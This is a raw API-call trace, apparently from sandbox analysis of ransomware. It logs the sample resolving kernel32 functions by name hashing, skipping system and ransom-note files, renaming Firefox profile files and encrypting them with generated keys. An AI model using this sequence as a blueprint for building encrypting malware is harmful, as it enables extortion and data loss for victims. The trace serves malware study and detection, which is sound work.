lpString1="CreatePipe") returned="CreatePipe" [0082.071] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.071] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.071] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.071] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.071] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.072] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.072] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.072] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.072] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.072] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.072] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.072] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.072] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.072] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.072] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.072] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.072] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.072] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.072] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.072] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.072] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.072] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.072] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.072] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.072] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.073] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.073] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.073] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.073] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.073] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.073] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.073] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.073] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.073] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.073] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.073] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.073] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.073] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.073] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.073] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.073] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.073] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.073] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.074] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.074] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.074] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.074] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.074] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.074] lstrlenA (lpString="DELETEATOM") returned 10 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.074] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.074] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.074] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.074] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.074] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.074] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.074] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.074] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.074] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.074] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.074] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.074] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.074] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.075] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.075] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.075] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.075] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.075] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.075] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.075] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.075] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.075] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.075] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.075] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.075] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.075] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.075] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.075] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.075] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.075] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.075] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.075] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.076] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.076] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.076] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.076] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.076] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.076] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.076] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.076] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.076] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 97 [0082.076] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.TXerv") returned 103 [0082.076] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.TXerv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.txerv"), dwFlags=0x0) returned 1 [0082.077] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.077] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.077] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.077] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3787480, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.bak", cAlternateFileName="SESSIO~1.BAK")) returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="DECRYPT-FILES.txt") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="autorun.inf") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="boot.ini") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="desktop.ini") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="ntuser.dat") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="iconcache.db") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="bootsect.bak") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="ntuser.dat.log") returned 1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="thumbs.db") returned -1 [0082.078] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Bootfont.bin") returned 1 [0082.078] lstrlenW (lpString="sessionstore.bak") returned 16 [0082.078] lstrcmpiW (lpString1="bak", lpString2="lnk") returned -1 [0082.078] lstrcmpiW (lpString1="bak", lpString2="exe") returned -1 [0082.078] lstrcmpiW (lpString1="bak", lpString2="sys") returned -1 [0082.078] lstrcmpiW (lpString1="bak", lpString2="dll") returned -1 [0082.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.078] lstrlenW (lpString="sessionstore.bak") returned 16 [0082.078] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" [0082.078] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.079] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=982) returned 1 [0082.079] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.079] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.079] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.080] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.080] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.080] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.080] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.081] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.081] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.081] CloseHandle (hObject=0x464) returned 1 [0082.081] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.081] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.082] CloseHandle (hObject=0x0) returned 0 [0082.082] CloseHandle (hObject=0x460) returned 1 [0082.082] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.082] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.083] GetTickCount () returned 0x114cfed [0082.083] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.083] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.083] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.083] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.083] lstrlenA (lpString="kernel32.dll") returned 12 [0082.083] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.084] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 